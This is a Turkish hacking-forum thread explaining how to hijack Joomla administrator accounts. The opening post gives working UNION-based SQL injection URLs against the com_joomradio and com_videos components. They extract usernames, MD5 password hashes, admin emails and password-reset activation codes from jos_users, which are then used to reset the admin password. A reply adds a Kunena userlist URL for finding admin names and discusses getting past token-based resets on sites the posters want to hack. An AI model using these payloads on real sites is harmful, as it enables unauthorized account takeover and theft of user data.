Joomla Sitelerde Admin şifresi Sıfırlama - MD5

N

!nFiNiTe

Kadim Üye
21 Şub 2011
5,915
3
Hell
S.a Arklar Döküman Verildiyse Özür Dilerim..

Joomla sitelerin veritabanı mysql olduğu için user şifreleri md5 şeklinde kriptoludur. Kırılmayan bu admin şifrelerini sıfırlamaya yolunu bir arkadaştan buldum, burada paylaşmak istedim.

Kullanıcı adı ve Şifreleri bu şekilde öğreniriz.

Kod: 
[B][B]http://localhost/index.php?view=display&option=com_joomradio&id=1+and+1=2/**/UniON/**/SeLeCT/**/0,GroUP_CoNCaT(username,0x3d,password),2,3,4,5,6,7,8,9,10/**/FROm/**/jos_users[/B][/B]
admin:d94236746886b37f57cba28145926c09

Ekrana bu şekilde bilgimiz geldi ve md5 çözülemiyor. Sırada admin mail adresini öğreniriz.
Kod: 
[B][B]http://localhost/index.php?view=display&option=com_joomradio&id=1+and+1=2/**/UniON/**/SeLeCT/**/0,GroUP_CoNCaT(username,0x3d,email),2,3,4,5,6,7,8,9,10/**/FROm/**/jos_users[/B][/B]
admin:[email protected]

Ekranda admin in mail adresi de çıktı. şimdi aşağıdaki linke giriyoruz.
Kod: 
[B][B]http://localhost/index.php?option=com_user&view=reset[/B][/B]
Şifre sıfırlama bölümünden maili yazıyoruz sonra aktivasyon kodu isteyecek şimdi maile yolladığı aktivasyon kodunu öğrenelim.
Kod: 
[B][B]http://localhost/index.php?view=display&option=com_videos&id=3+and+1=2/**/UniON/**/SeLeCT/**/0,GroUP_CoNCaT(username,0x3d,activation),2,3,4,5,6,7,8,9,10/**/FROm/**/jos_users[/B][/B]
admin:aktivekodu aktivasyon kodunu böylece alıp şifreyi değiştirebiliriz artık.


Alıntı.
 
Son düzenleme:
P

pcplator

Yeni üye
18 Eki 2009
3
0
arkadasım yanlıs anlama ama sunu solıyım senın verdıgın

index.php?option=com_user&view=reset&layout=confirm

su reset kodu joomla 1.5.x hepsi icin gecerli email bölümünü atlasak bile mysql acıgı yoksa hacklemek istedigimiz sitede senin paylastıgın su kod ile :

index.php?view=display&option=com_videos&id=3+and+1=2/**/UniON/**/SeLeCT/**/0,GroUP_CoNCaT(username,0x3d,activation),2,3,4,5,6,7,8,9,10/**/FROm/**/jos_users

adamın acıgını bulmus yanlız kapısında kalmıs gıbı oluruz. cunku token acıgı bulduk dıyelım admin kullanıcı ısmınıde su kodla eger forumu varsa joomlasında kurulu olan kunena olsa su sekılde bulduk desek:

/index.php?option=com_kunena&Itemid=0&func=userlist

admin kullanıcı ısmı bulundu sifre resetlemeyede acık token acıgıyla yanlız mysql acıgı yok ozaman napıcaz ?

bizden activasyon kodu istiyorsa ? bu acıgı kapatalı adamlar baya oldu tokenlı joomla busuru kullanan var ve karsısına bole bır sekılde cıkan bır sıte oldumu sıteyı ya pas gecer ya baska acıklar dener yada hackledıgı bır sıtenın serverında ıse yada şifresini cekmeye calısır :S

benım demek ıstedıgım bu kadar yolları asıp son cagre sıtede dedıgım gıbı olsa actıvasyon kodunu baska sekılde almanın bır yolu varmı? varsa tmm yoksa bedavaya ugrasıyoz bence
 
B

BluehackerTR

Üye
16 Eki 2011
207
0
Çok Teşekkür Ederim Kardeşim Ancak Biraz Aşağıya Bakarsan Ben Bunu Videolu Şekilde Paylasdım Yinede Çok Teşekkurler...
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.